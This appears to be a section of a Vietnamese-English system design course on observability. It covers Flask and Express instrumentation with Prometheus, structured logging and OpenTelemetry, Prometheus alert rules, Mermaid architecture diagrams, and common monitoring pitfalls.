6. Code — Instrumentation Examples

6.1 Python: Flask App with Prometheus Metrics + Structured Logging + OpenTelemetry

"""
Full observability instrumentation for a Python Flask service.
Includes: Prometheus metrics, structured logging, OpenTelemetry tracing.
"""
 
import time
import logging
import json
import sys
from datetime import datetime, timezone
 
from flask import Flask, request, g
from prometheus_client import (
    Counter, Histogram, Gauge, Info,
    generate_latest, CONTENT_TYPE_LATEST
)
from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
from opentelemetry.instrumentation.flask import FlaskInstrumentor
from opentelemetry.instrumentation.requests import RequestsInstrumentor
from opentelemetry.propagate import set_global_textmap
from opentelemetry.propagators.b3 import B3MultiFormat
from opentelemetry.sdk.resources import Resource
 
 
# ============================================================
# 1. STRUCTURED LOGGING SETUP
# ============================================================
 
class StructuredJsonFormatter(logging.Formatter):
    """
    Custom JSON formatter cho structured logging.
    Mọi log output đều là JSON — dễ parse bởi Logstash/Fluentd/Loki.
    """
    def format(self, record):
        log_entry = {
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "level": record.levelname,
            "logger": record.name,
            "message": record.getMessage(),
            "service": "payment-service",
            "instance": "payment-7b4f9d8c-x2k9p",
            "version": "2.1.0",
        }
 
        # Add trace context if available
        span = trace.get_current_span()
        if span and span.is_recording():
            ctx = span.get_span_context()
            log_entry["trace_id"] = format(ctx.trace_id, "032x")
            log_entry["span_id"] = format(ctx.span_id, "016x")
 
        # Add request context if available
        if hasattr(g, "request_id"):
            log_entry["request_id"] = g.request_id
 
        # Add extra fields
        if hasattr(record, "extra_fields"):
            log_entry.update(record.extra_fields)
 
        # Add exception info
        if record.exc_info and record.exc_info[0]:
            log_entry["exception"] = {
                "type": record.exc_info[0].__name__,
                "message": str(record.exc_info[1]),
                "traceback": self.formatException(record.exc_info),
            }
 
        return json.dumps(log_entry, default=str)
 
 
def setup_logging():
    handler = logging.StreamHandler(sys.stdout)
    handler.setFormatter(StructuredJsonFormatter())
 
    root_logger = logging.getLogger()
    root_logger.handlers.clear()
    root_logger.addHandler(handler)
    root_logger.setLevel(logging.INFO)
 
    return logging.getLogger("payment-service")
 
 
logger = setup_logging()
 
 
# ============================================================
# 2. OPENTELEMETRY TRACING SETUP
# ============================================================
 
def setup_tracing(app: Flask):
    resource = Resource.create({
        "service.name": "payment-service",
        "service.version": "2.1.0",
        "deployment.environment": "production",
    })
 
    provider = TracerProvider(resource=resource)
 
    # Export traces to OTel Collector via OTLP/gRPC
    otlp_exporter = OTLPSpanExporter(
        endpoint="otel-collector:4317",
        insecure=True,  # Use TLS in production!
    )
    provider.add_span_processor(BatchSpanProcessor(otlp_exporter))
    trace.set_tracer_provider(provider)
 
    # Auto-instrument Flask
    FlaskInstrumentor().instrument_app(app)
    # Auto-instrument outgoing HTTP requests
    RequestsInstrumentor().instrument()
 
    return trace.get_tracer("payment-service")
 
 
# ============================================================
# 3. PROMETHEUS METRICS SETUP
# ============================================================
 
# Service info
SERVICE_INFO = Info("service", "Service information")
SERVICE_INFO.info({
    "name": "payment-service",
    "version": "2.1.0",
    "language": "python",
})
 
# Request metrics (RED method)
REQUEST_COUNT = Counter(
    "http_requests_total",
    "Total HTTP requests",
    ["method", "path", "status"]
)
 
REQUEST_DURATION = Histogram(
    "http_request_duration_seconds",
    "HTTP request duration in seconds",
    ["method", "path"],
    buckets=[0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1.0, 2.5, 5.0, 10.0]
)
 
REQUEST_SIZE = Histogram(
    "http_request_size_bytes",
    "HTTP request size in bytes",
    ["method", "path"],
    buckets=[100, 500, 1000, 5000, 10000, 50000, 100000, 500000]
)
 
RESPONSE_SIZE = Histogram(
    "http_response_size_bytes",
    "HTTP response size in bytes",
    ["method", "path"],
    buckets=[100, 500, 1000, 5000, 10000, 50000, 100000, 500000]
)
 
# Business metrics
PAYMENT_PROCESSED = Counter(
    "payments_processed_total",
    "Total payments processed",
    ["status", "method"]   # status: success/failed, method: card/bank/wallet
)
 
PAYMENT_AMOUNT = Histogram(
    "payment_amount_usd",
    "Payment amount in USD",
    ["method"],
    buckets=[1, 5, 10, 50, 100, 500, 1000, 5000, 10000]
)
 
# Resource metrics
ACTIVE_CONNECTIONS = Gauge(
    "active_connections",
    "Number of active connections"
)
 
DB_POOL_SIZE = Gauge(
    "db_connection_pool_size",
    "Database connection pool size",
    ["state"]   # active, idle, waiting
)
 
 
# ============================================================
# 4. FLASK APP WITH INSTRUMENTATION
# ============================================================
 
app = Flask(__name__)
tracer = setup_tracing(app)
 
 
@app.before_request
def before_request():
    g.start_time = time.time()
    g.request_id = request.headers.get("X-Request-ID", "unknown")
    ACTIVE_CONNECTIONS.inc()
 
 
@app.after_request
def after_request(response):
    # Calculate duration
    duration = time.time() - g.start_time
    path = request.url_rule.rule if request.url_rule else request.path
 
    # Record metrics
    REQUEST_COUNT.labels(
        method=request.method,
        path=path,
        status=response.status_code
    ).inc()
 
    REQUEST_DURATION.labels(
        method=request.method,
        path=path
    ).observe(duration)
 
    REQUEST_SIZE.labels(
        method=request.method,
        path=path
    ).observe(request.content_length or 0)
 
    RESPONSE_SIZE.labels(
        method=request.method,
        path=path
    ).observe(response.content_length or 0)
 
    ACTIVE_CONNECTIONS.dec()
 
    # Structured access log
    logger.info(
        "Request completed",
        extra={"extra_fields": {
            "method": request.method,
            "path": request.path,
            "status_code": response.status_code,
            "duration_ms": round(duration * 1000, 2),
            "client_ip": request.remote_addr,
            "user_agent": request.headers.get("User-Agent", ""),
            "request_id": g.request_id,
        }}
    )
 
    return response
 
 
@app.route("/api/v1/payments", methods=["POST"])
def process_payment():
    """Example endpoint with full instrumentation."""
    with tracer.start_as_current_span("process_payment") as span:
        try:
            data = request.get_json()
            amount = data.get("amount", 0)
            method = data.get("payment_method", "card")
 
            # Add span attributes (for trace context)
            span.set_attribute("payment.amount", amount)
            span.set_attribute("payment.method", method)
            span.set_attribute("payment.currency", "USD")
 
            # Simulate DB call
            with tracer.start_as_current_span("db_insert_payment"):
                time.sleep(0.02)  # Simulate DB latency
 
            # Simulate external payment gateway call
            with tracer.start_as_current_span("call_payment_gateway") as gw_span:
                gw_span.set_attribute("gateway.name", "stripe")
                time.sleep(0.1)  # Simulate gateway latency
 
            # Record business metrics
            PAYMENT_PROCESSED.labels(status="success", method=method).inc()
            PAYMENT_AMOUNT.labels(method=method).observe(amount)
 
            logger.info("Payment processed successfully", extra={"extra_fields": {
                "payment_method": method,
                "amount": amount,
                "event": "payment_success",
            }})
 
            return {"status": "success", "transaction_id": "txn_abc123"}, 200
 
        except Exception as e:
            PAYMENT_PROCESSED.labels(status="failed", method=method).inc()
            span.record_exception(e)
            span.set_status(trace.StatusCode.ERROR, str(e))
 
            logger.error("Payment processing failed", exc_info=True, extra={"extra_fields": {
                "payment_method": method,
                "amount": amount,
                "event": "payment_failed",
            }})
 
            return {"status": "error", "message": "Payment failed"}, 500
 
 
@app.route("/metrics")
def metrics():
    """Prometheus metrics endpoint."""
    return generate_latest(), 200, {"Content-Type": CONTENT_TYPE_LATEST}
 
 
@app.route("/health")
def health():
    return {"status": "healthy"}, 200
 
 
if __name__ == "__main__":
    logger.info("Starting payment service", extra={"extra_fields": {"event": "startup"}})
    app.run(host="0.0.0.0", port=8082, debug=False)

6.2 Node.js: Express App with Full Observability

/**
 * Full observability instrumentation for a Node.js Express service.
 * Includes: Prometheus metrics, structured logging (pino), OpenTelemetry tracing.
 */
 
// ============================================================
// 1. OPENTELEMETRY SETUP (must be first import!)
// ============================================================
const { NodeSDK } = require("@opentelemetry/sdk-node");
const {
  OTLPTraceExporter,
} = require("@opentelemetry/exporter-trace-otlp-grpc");
const {
  getNodeAutoInstrumentations,
} = require("@opentelemetry/auto-instrumentations-node");
const { Resource } = require("@opentelemetry/resources");
const {
  SEMRESATTRS_SERVICE_NAME,
  SEMRESATTRS_SERVICE_VERSION,
  SEMRESATTRS_DEPLOYMENT_ENVIRONMENT,
} = require("@opentelemetry/semantic-conventions");
 
const sdk = new NodeSDK({
  resource: new Resource({
    [SEMRESATTRS_SERVICE_NAME]: "order-service",
    [SEMRESATTRS_SERVICE_VERSION]: "1.5.0",
    [SEMRESATTRS_DEPLOYMENT_ENVIRONMENT]: "production",
  }),
  traceExporter: new OTLPTraceExporter({
    url: "grpc://otel-collector:4317",
  }),
  instrumentations: [
    getNodeAutoInstrumentations({
      "@opentelemetry/instrumentation-fs": { enabled: false }, // noisy
    }),
  ],
});
 
sdk.start();
 
// ============================================================
// 2. STRUCTURED LOGGING (pino)
// ============================================================
const pino = require("pino");
const { trace, context } = require("@opentelemetry/api");
 
const logger = pino({
  level: process.env.LOG_LEVEL || "info",
  formatters: {
    level(label) {
      return { level: label };
    },
  },
  mixin() {
    // Inject trace context into every log line
    const span = trace.getSpan(context.active());
    if (span) {
      const ctx = span.spanContext();
      return {
        trace_id: ctx.traceId,
        span_id: ctx.spanId,
      };
    }
    return {};
  },
  base: {
    service: "order-service",
    version: "1.5.0",
    environment: "production",
  },
  // PII redaction paths
  redact: {
    paths: [
      "req.headers.authorization",
      "req.headers.cookie",
      "body.password",
      "body.credit_card",
      "body.ssn",
      "user.email",
    ],
    censor: "[REDACTED]",
  },
  timestamp: pino.stdTimeFunctions.isoTime,
});
 
// ============================================================
// 3. PROMETHEUS METRICS
// ============================================================
const promClient = require("prom-client");
const { register } = promClient;
 
// Default metrics (Node.js runtime: event loop, GC, memory, etc.)
promClient.collectDefaultMetrics({
  prefix: "nodejs_",
  gcDurationBuckets: [0.001, 0.01, 0.1, 1, 2, 5],
});
 
// RED metrics
const httpRequestsTotal = new promClient.Counter({
  name: "http_requests_total",
  help: "Total number of HTTP requests",
  labelNames: ["method", "path", "status"],
});
 
const httpRequestDuration = new promClient.Histogram({
  name: "http_request_duration_seconds",
  help: "HTTP request duration in seconds",
  labelNames: ["method", "path"],
  buckets: [0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1, 2.5, 5, 10],
});
 
const httpRequestSize = new promClient.Histogram({
  name: "http_request_size_bytes",
  help: "HTTP request payload size",
  labelNames: ["method", "path"],
  buckets: [100, 500, 1000, 5000, 10000, 50000, 100000],
});
 
// Business metrics
const ordersCreated = new promClient.Counter({
  name: "orders_created_total",
  help: "Total orders created",
  labelNames: ["status"],
});
 
const orderAmount = new promClient.Histogram({
  name: "order_amount_usd",
  help: "Order amount in USD",
  buckets: [10, 50, 100, 500, 1000, 5000],
});
 
const activeWebSockets = new promClient.Gauge({
  name: "active_websocket_connections",
  help: "Number of active WebSocket connections",
});
 
// ============================================================
// 4. EXPRESS APP
// ============================================================
const express = require("express");
const app = express();
 
app.use(express.json());
 
// Metrics middleware
app.use((req, res, next) => {
  const start = process.hrtime.bigint();
 
  res.on("finish", () => {
    const duration = Number(process.hrtime.bigint() - start) / 1e9;
    const path = req.route?.path || req.path;
 
    // Skip metrics endpoint from recording
    if (path === "/metrics" || path === "/health") return;
 
    httpRequestsTotal.inc({
      method: req.method,
      path: path,
      status: res.statusCode,
    });
 
    httpRequestDuration.observe(
      { method: req.method, path: path },
      duration
    );
 
    httpRequestSize.observe(
      { method: req.method, path: path },
      parseInt(req.headers["content-length"] || "0", 10)
    );
 
    // Structured access log
    logger.info({
      msg: "Request completed",
      method: req.method,
      path: req.path,
      status_code: res.statusCode,
      duration_ms: Math.round(duration * 1000),
      client_ip: req.ip,
      request_id: req.headers["x-request-id"] || "unknown",
    });
  });
 
  next();
});
 
// Routes
app.post("/api/v1/orders", async (req, res) => {
  const tracer = trace.getTracer("order-service");
 
  try {
    const { items, total_amount } = req.body;
 
    logger.info({
      msg: "Processing new order",
      items_count: items?.length,
      total_amount,
      event: "order_processing",
    });
 
    // Simulate order processing
    await new Promise((resolve) => setTimeout(resolve, 50));
 
    // Record business metrics
    ordersCreated.inc({ status: "success" });
    orderAmount.observe(total_amount || 0);
 
    logger.info({
      msg: "Order created successfully",
      order_id: "ord_xyz789",
      total_amount,
      event: "order_created",
    });
 
    res.status(201).json({
      status: "success",
      order_id: "ord_xyz789",
    });
  } catch (err) {
    ordersCreated.inc({ status: "failed" });
 
    logger.error({
      msg: "Order creation failed",
      error: err.message,
      stack: err.stack,
      event: "order_failed",
    });
 
    res.status(500).json({ status: "error", message: "Order failed" });
  }
});
 
// Prometheus metrics endpoint
app.get("/metrics", async (req, res) => {
  res.set("Content-Type", register.contentType);
  res.end(await register.metrics());
});
 
// Health check
app.get("/health", (req, res) => {
  res.json({ status: "healthy", uptime: process.uptime() });
});
 
const PORT = process.env.PORT || 8083;
app.listen(PORT, () => {
  logger.info({ msg: `Order service started on port ${PORT}`, event: "startup" });
});
 
// Graceful shutdown
process.on("SIGTERM", async () => {
  logger.info({ msg: "Received SIGTERM, shutting down gracefully", event: "shutdown" });
  await sdk.shutdown();
  process.exit(0);
});

6.3 Alerting Rules YAML (Prometheus)

prometheus/alert-rules.yml:

groups:
  # ===========================================================
  # GOLDEN SIGNALS ALERTS
  # ===========================================================
  - name: golden_signals
    rules:
      # --- LATENCY ---
      - alert: HighP99Latency
        expr: |
          histogram_quantile(0.99,
            sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
          ) > 0.5
        for: 5m
        labels:
          severity: high
          category: performance
        annotations:
          summary: "P99 latency > 500ms for {{ $labels.service }}"
          description: "P99 latency is {{ $value | humanizeDuration }} for service {{ $labels.service }}"
          runbook_url: "https://wiki.internal/runbooks/high-latency"
 
      - alert: CriticalP99Latency
        expr: |
          histogram_quantile(0.99,
            sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
          ) > 2.0
        for: 2m
        labels:
          severity: critical
          category: performance
        annotations:
          summary: "P99 latency > 2s for {{ $labels.service }}"
          runbook_url: "https://wiki.internal/runbooks/critical-latency"
 
      # --- ERRORS ---
      - alert: HighErrorRate
        expr: |
          sum by (service) (rate(http_requests_total{status=~"5.."}[5m]))
          /
          sum by (service) (rate(http_requests_total[5m]))
          > 0.01
        for: 5m
        labels:
          severity: high
          category: errors
        annotations:
          summary: "Error rate > 1% for {{ $labels.service }}"
          description: "Error rate is {{ $value | humanizePercentage }} for service {{ $labels.service }}"
          runbook_url: "https://wiki.internal/runbooks/high-error-rate"
 
      - alert: CriticalErrorRate
        expr: |
          sum by (service) (rate(http_requests_total{status=~"5.."}[5m]))
          /
          sum by (service) (rate(http_requests_total[5m]))
          > 0.05
        for: 2m
        labels:
          severity: critical
          category: errors
        annotations:
          summary: "Error rate > 5% for {{ $labels.service }}"
          runbook_url: "https://wiki.internal/runbooks/critical-error-rate"
 
      # --- TRAFFIC ---
      - alert: TrafficAnomaly
        expr: |
          sum(rate(http_requests_total[5m]))
          >
          2 * avg_over_time(sum(rate(http_requests_total[5m]))[7d:1h])
        for: 10m
        labels:
          severity: warning
          category: traffic
        annotations:
          summary: "Traffic is 2x above 7-day average"
          description: "Current QPS: {{ $value | humanize }}. Could be organic growth or DDoS."
 
      - alert: ZeroTraffic
        expr: sum(rate(http_requests_total[5m])) == 0
        for: 5m
        labels:
          severity: critical
          category: traffic
        annotations:
          summary: "Zero traffic detected — possible total outage"
          runbook_url: "https://wiki.internal/runbooks/zero-traffic"
 
      # --- SATURATION ---
      - alert: HighCPUUsage
        expr: |
          100 - (avg by (instance) (rate(node_cpu_seconds_total{mode="idle"}[5m])) * 100) > 85
        for: 10m
        labels:
          severity: warning
          category: saturation
        annotations:
          summary: "CPU usage > 85% on {{ $labels.instance }}"
 
      - alert: HighMemoryUsage
        expr: |
          (1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100 > 90
        for: 5m
        labels:
          severity: high
          category: saturation
        annotations:
          summary: "Memory usage > 90% on {{ $labels.instance }}"
 
      - alert: DiskSpaceLow
        expr: |
          (1 - node_filesystem_avail_bytes{mountpoint="/"} / node_filesystem_size_bytes{mountpoint="/"}) * 100 > 85
        for: 15m
        labels:
          severity: warning
          category: saturation
        annotations:
          summary: "Disk usage > 85% on {{ $labels.instance }}"
          description: "Disk will be full in {{ $value | humanizeDuration }} at current rate"
 
      - alert: DiskWillFillIn7Days
        expr: |
          predict_linear(node_filesystem_avail_bytes{mountpoint="/"}[7d], 7*24*3600) < 0
        for: 1h
        labels:
          severity: high
          category: saturation
        annotations:
          summary: "Disk predicted to fill within 7 days on {{ $labels.instance }}"
 
  # ===========================================================
  # SLO-BASED BURN RATE ALERTS
  # ===========================================================
  - name: slo_burn_rate
    rules:
      # SLO: 99.9% availability (error budget = 0.1%)
      # Burn rate 14.4x → budget exhausted in ~2 days
      - alert: SLOBurnRateCritical
        expr: |
          (
            sum(rate(http_requests_total{status=~"5.."}[5m]))
            /
            sum(rate(http_requests_total[5m]))
          ) > (14.4 * 0.001)
          and
          (
            sum(rate(http_requests_total{status=~"5.."}[1h]))
            /
            sum(rate(http_requests_total[1h]))
          ) > (14.4 * 0.001)
        for: 2m
        labels:
          severity: critical
          category: slo
        annotations:
          summary: "SLO burn rate > 14.4x — error budget exhausts in ~2 days"
          runbook_url: "https://wiki.internal/runbooks/slo-burn-rate"
 
      # Burn rate 6x → budget exhausted in ~5 days
      - alert: SLOBurnRateHigh
        expr: |
          (
            sum(rate(http_requests_total{status=~"5.."}[30m]))
            /
            sum(rate(http_requests_total[30m]))
          ) > (6 * 0.001)
          and
          (
            sum(rate(http_requests_total{status=~"5.."}[6h]))
            /
            sum(rate(http_requests_total[6h]))
          ) > (6 * 0.001)
        for: 5m
        labels:
          severity: high
          category: slo
        annotations:
          summary: "SLO burn rate > 6x — error budget exhausts in ~5 days"
 
  # ===========================================================
  # SECURITY ALERTS
  # ===========================================================
  - name: security_alerts
    rules:
      - alert: HighRateOf401
        expr: |
          sum(rate(http_requests_total{status="401"}[5m])) > 50
        for: 2m
        labels:
          severity: high
          category: security
        annotations:
          summary: "High rate of 401 Unauthorized — possible brute force attack"
          runbook_url: "https://wiki.internal/runbooks/auth-attack"
 
      - alert: HighRateOf403
        expr: |
          sum(rate(http_requests_total{status="403"}[5m])) > 100
        for: 2m
        labels:
          severity: high
          category: security
        annotations:
          summary: "High rate of 403 Forbidden — possible enumeration attack"
 
      - alert: SuspiciousTrafficSpike
        expr: |
          sum(rate(http_requests_total[1m]))
          >
          5 * avg_over_time(sum(rate(http_requests_total[1m]))[1d:5m])
        for: 5m
        labels:
          severity: critical
          category: security
        annotations:
          summary: "Traffic spike 5x above daily average — possible DDoS"
          runbook_url: "https://wiki.internal/runbooks/ddos-response"
 
  # ===========================================================
  # MONITORING THE MONITORING (Meta-monitoring)
  # ===========================================================
  - name: meta_monitoring
    rules:
      - alert: PrometheusTargetDown
        expr: up == 0
        for: 3m
        labels:
          severity: high
          category: monitoring
        annotations:
          summary: "Prometheus target {{ $labels.instance }} is down"
 
      - alert: PrometheusStorageFull
        expr: |
          prometheus_tsdb_storage_blocks_bytes / (50 * 1024^3) > 0.85
        for: 15m
        labels:
          severity: warning
          category: monitoring
        annotations:
          summary: "Prometheus storage > 85% of 50GB limit"
 
      - alert: AlertmanagerNotificationFailed
        expr: |
          rate(alertmanager_notifications_failed_total[5m]) > 0
        for: 5m
        labels:
          severity: high
          category: monitoring
        annotations:
          summary: "Alertmanager failing to send notifications via {{ $labels.integration }}"
 
      - alert: HighCardinalitySeries
        expr: prometheus_tsdb_head_series > 500000
        for: 15m
        labels:
          severity: warning
          category: monitoring
        annotations:
          summary: "Prometheus tracking {{ $value }} active series — cardinality may be too high"

7. Mermaid Diagrams

7.1 Observability Stack Architecture

flowchart TB
    subgraph "Application Layer"
        A1[Service A<br/>Python/Flask]
        A2[Service B<br/>Node.js/Express]
        A3[Service C<br/>Go/Gin]
    end

    subgraph "Collection Layer"
        direction TB
        P[Prometheus<br/>Scrapes /metrics<br/>every 15s]
        OC[OpenTelemetry<br/>Collector]
        FB[Filebeat<br/>Log Shipper]
    end

    subgraph "Processing Layer"
        LS[Logstash<br/>Parse · Filter PII<br/>Transform · Enrich]
    end

    subgraph "Storage Layer"
        TSDB[(Prometheus TSDB<br/>Metrics · 30d)]
        ES[(Elasticsearch<br/>Logs · 90d)]
        JG[(Jaeger<br/>Traces · 7d)]
    end

    subgraph "Visualization Layer"
        GR[Grafana<br/>Dashboards]
        KB[Kibana<br/>Log Search]
        JU[Jaeger UI<br/>Trace Explorer]
    end

    subgraph "Alerting Layer"
        AM[Alertmanager<br/>Route · Group · Dedup]
        PD[PagerDuty<br/>Escalation]
        SL[Slack<br/>Notifications]
        EM[Email<br/>Reports]
    end

    %% Data Flow
    A1 & A2 & A3 -->|"/metrics"| P
    A1 & A2 & A3 -->|"OTLP gRPC"| OC
    A1 & A2 & A3 -->|"stdout/files"| FB

    P -->|"store"| TSDB
    OC -->|"traces"| JG
    OC -->|"metrics"| TSDB
    FB -->|"ship"| LS
    LS -->|"index"| ES

    TSDB --> GR
    ES --> KB
    ES --> GR
    JG --> JU
    JG --> GR

    P -->|"alert rules"| AM
    AM --> PD
    AM --> SL
    AM --> EM

    style P fill:#e65100,stroke:#333,color:#fff
    style GR fill:#f9a825,stroke:#333
    style AM fill:#c62828,stroke:#333,color:#fff
    style OC fill:#1565c0,stroke:#333,color:#fff
    style ES fill:#2e7d32,stroke:#333,color:#fff

7.2 Alert Escalation Flow

flowchart TD
    A[Prometheus<br/>Alert Rule Fires] --> B{Alertmanager<br/>Receives Alert}

    B --> C{Severity?}

    C -->|P1 Critical| D[PagerDuty<br/>+ Slack #incidents]
    C -->|P2 High| E[Slack #incidents]
    C -->|P3 Warning| F[Slack #alerts]
    C -->|P4 Info| G[Email / Dashboard]

    D --> H{On-call Primary<br/>Ack in 5min?}
    H -->|Yes| I[Primary Investigates]
    H -->|No| J{On-call Secondary<br/>Ack in 10min?}

    J -->|Yes| K[Secondary Investigates]
    J -->|No| L{Engineering Manager<br/>Ack in 15min?}

    L -->|Yes| M[Manager Coordinates]
    L -->|No| N[VP/CTO Notified<br/>War Room Opened]

    I --> O{Resolved?}
    K --> O
    M --> O
    N --> O

    O -->|Yes| P[Alertmanager sends<br/>RESOLVED notification]
    O -->|No, > 30 min| Q[Incident Commander<br/>Declared]

    P --> R[Postmortem<br/>within 48h]
    Q --> S[Cross-team Response<br/>Status Page Updated]
    S --> O

    E --> T[On-call Reviews<br/>within 30min]
    F --> U[Team Reviews<br/>within 4h]

    style D fill:#c62828,stroke:#333,color:#fff
    style N fill:#c62828,stroke:#333,color:#fff
    style P fill:#2e7d32,stroke:#333,color:#fff
    style Q fill:#e65100,stroke:#333,color:#fff

7.3 Request Lifecycle with Observability

sequenceDiagram
    participant U as User
    participant GW as API Gateway
    participant OS as Order Service
    participant PS as Payment Service
    participant DB as Database
    participant P as Prometheus
    participant L as Logstash/ES
    participant J as Jaeger

    Note over U,J: trace_id: abc-123 propagated via W3C headers

    U->>GW: POST /api/orders
    activate GW
    Note right of GW: span_id: s1<br/>Log: "Received request"<br/>Metric: request_count++

    GW->>OS: Forward + traceparent header
    activate OS
    Note right of OS: span_id: s2 (parent: s1)<br/>Log: "Processing order"<br/>Metric: order_count++

    OS->>PS: POST /internal/payments
    activate PS
    Note right of PS: span_id: s3 (parent: s2)<br/>Log: "Processing payment"

    PS->>DB: INSERT payment
    activate DB
    Note right of DB: span_id: s4 (parent: s3)<br/>Metric: db_query_duration

    DB-->>PS: OK
    deactivate DB

    PS-->>OS: Payment confirmed
    deactivate PS

    OS-->>GW: Order created
    deactivate OS

    GW-->>U: 201 Created
    deactivate GW

    Note over P: Scrapes /metrics every 15s<br/>Records: latency, QPS, errors
    Note over L: Receives structured logs<br/>Indexes in Elasticsearch
    Note over J: Receives trace spans<br/>Builds trace waterfall view

8. Aha Moments & Pitfalls

Aha Moment #1: Alert Fatigue kills Monitoring

Nếu on-call engineer nhận 100 alerts/ngày, sau 2 tuần họ sẽ ignore tất cả — kể cả alert thật sự critical. Đây gọi là alert fatigue (mệt mỏi cảnh báo), và nó đã gây ra nhiều outage nghiêm trọng thực tế (AWS, Google đều từng document).

Giải pháp: Mỗi alert phải actionable (có thể hành động). Nếu alert fires mà engineer không cần làm gì → xoá alert đó. Target: < 5 pages/tuần cho mỗi on-call rotation.

Aha Moment #2: Monitoring the Monitoring

Điều gì xảy ra khi Prometheus chết? Không có alert nào fires cả — vì Prometheus chính là hệ thống gửi alert! Đây là meta-monitoring problem.

Giải pháp:

Dùng Deadman’s switch: Prometheus gửi heartbeat alert mỗi 1 phút. Nếu PagerDuty không nhận heartbeat trong 5 phút → alert “Prometheus is down”

Chạy 2 Prometheus instances cross-monitor nhau

Dùng managed monitoring (Datadog, Grafana Cloud) làm backup cho self-hosted Prometheus

Aha Moment #3: Cardinality Explosion — Silent Killer

Một developer thêm user_id làm label cho metric → 10M users = 10M time series. Prometheus OOM crash lúc 3AM. Không có alert (vì Prometheus đã chết — xem Aha #2).

Prevention:

Code review cho mọi metric changes

Alert khi prometheus_tsdb_head_series > threshold

Enforce label whitelist trong Prometheus relabeling config

Dùng recording rules để pre-aggregate high-cardinality metrics

Aha Moment #4: Log Volume = Money

Với 10K QPS, log 5 lines/request = 4.32B log lines/day = 2.16TB raw/day. Elasticsearch storage cho 90 ngày = 64TB. Trên AWS, 64TB EBS gp3 = ~$5,120/month CHỈ cho storage (chưa kể compute cho ES nodes).

Giải pháp thực tế:

Log levels: Production default = WARN. Chỉ bật DEBUG cho specific service khi troubleshooting

Sampling: Log 10% của successful requests, 100% của errors

Tiered storage: Hot (SSD, 7 ngày) → Warm (HDD, 30 ngày) → Cold (S3, 1 năm) → Delete

Loki thay Elasticsearch: Index chỉ labels, không full-text → 10x cheaper storage

Log aggregation: Thay vì log mỗi request, aggregate thành metrics (rate, error count, latency percentiles)

Pitfall #1: Quên correlate giữa 3 pillars

Metrics cho thấy latency tăng. Logs cho thấy “timeout error”. Nhưng không biết liên quan thế nào vì không có trace_id chung giữa metrics → logs → traces.

Fix: Exemplar (Prometheus + Grafana Tempo). Từ metrics chart, click vào data point → jump thẳng tới trace → từ trace, click vào span → jump tới logs. Tất cả qua trace_id.

Pitfall #2: Dashboard quá nhiều panels

Dashboard 50 panels = không ai đọc. Giống cockpit máy bay — phi công nhìn 6 đồng hồ chính, không phải 500 đồng hồ.

Fix: Mỗi dashboard tối đa 10-12 panels. Tổ chức theo hierarchy: Overview → Service → Instance. Dùng drill-down links giữa các dashboards.

Pitfall #3: Alert trên symptoms, không trên causes

Sai: Alert khi CPU > 80%. CPU có thể cao vì batch job chạy đúng lịch — hoàn toàn bình thường.

Đúng: Alert khi P99 latency > SLO threshold. Nếu CPU 90% mà latency vẫn < 200ms → không cần page ai cả.

Pitfall #4: Không có runbook

Alert fires lúc 3AM. On-call engineer mới join team 2 tuần. Alert message: “HighErrorRate”. Không có link runbook. Engineer mất 45 phút để tìm hiểu context trước khi bắt đầu fix.

Fix: Mọi alert PHẢI có runbook_url annotation. Runbook chứa: (1) Alert nghĩa là gì, (2) Impact, (3) Steps to investigate, (4) Common fixes, (5) Escalation path.

Pitfall #5: Pre-aggregate metrics cho debugging chi tiết

Metric P99 latency tăng → không biết user nào, request gì, deploy nào gây ra. Pre-aggregated → mất detail.

Fix: Cho debugging path, dùng high-cardinality structured events (OpenTelemetry traces với rich attributes hoặc Honeycomb-style). Tham chiếu section 2.11. Metrics cho dashboard, events cho drill-down.

Pitfall #6: Instrument application code cho mọi metric

Add OpenTelemetry SDK → 5% performance overhead, language-specific libraries, miss kernel-level issues (TCP retransmits, syscall delay).

Fix: Dùng eBPF observability (Pixie, Cilium Hubble, Parca) cho infrastructure/network. Application SDK chỉ cho business logic. Tham chiếu section 2.12.

Pitfall #7: Sampling 100% traces ở production

Trace data lớn → 1TB/day → cost nhanh chóng vượt revenue.

Fix: Tail-based sampling — keep 100% errors + 100% slow requests + 1% normal. Dùng OpenTelemetry Collector tail-sampler hoặc DataDog Live Search.

9. Internal Links — Liên kết kiến thức

Topic	Link	Mối liên hệ
Estimation	Tuan-02-Back-of-the-envelope	Dùng estimation để tính alert threshold, storage sizing cho monitoring stack
Networking	Tuan-03-Networking-DNS-CDN	Monitor DNS resolution time, CDN cache hit rate, network latency
API Design	Tuan-04-API-Design-REST-gRPC	Instrument API endpoints với RED metrics, structured logging per endpoint
Load Balancer	Tuan-05-Load-Balancer	Monitor LB health, connection distribution, backend health checks
Cache	Tuan-06-Cache-Strategy	Monitor cache hit rate, eviction rate, memory usage → critical SLI
Database	Tuan-07-Database-Sharding-Replication	Monitor replication lag, query latency, connection pool saturation
Message Queue	Tuan-08-Message-Queue	Monitor consumer lag, queue depth, dead letter queue size
Rate Limiter	Tuan-09-Rate-Limiter	Security alerts cho rate limit violations, DDoS detection
Consistent Hashing	Tuan-10-Consistent-Hashing	Monitor hash ring rebalancing, hotspot detection
Microservices	Tuan-11-Microservices-Pattern	Distributed tracing across services, service mesh observability
CI/CD	Tuan-12-CICD-Pipeline	Deploy frequency tracking, change failure rate (DORA metrics)
AuthN/AuthZ	Tuan-14-AuthN-AuthZ-Security	Monitor failed auth attempts, token expiration, permission denials
Data Security	Tuan-15-Data-Security-Encryption	Audit log monitoring, PII detection, encryption key rotation alerts
URL Shortener	Tuan-16-Design-URL-Shortener	Case study: monitor redirect latency, cache hit rate, storage growth
Chat System	Tuan-17-Design-Chat-System	Case study: monitor WebSocket connections, message delivery latency
Notification	Tuan-19-Design-Notification-System	Case study: monitor delivery rate, push notification latency, failure rate

Tham khảo

Alex Xu, System Design Interview — Chapter on Monitoring & Logging
Google SRE Book — Chapters: Monitoring Distributed Systems, Service Level Objectives, Practical Alerting
Betsy Beyer et al., Site Reliability Engineering (O’Reilly)
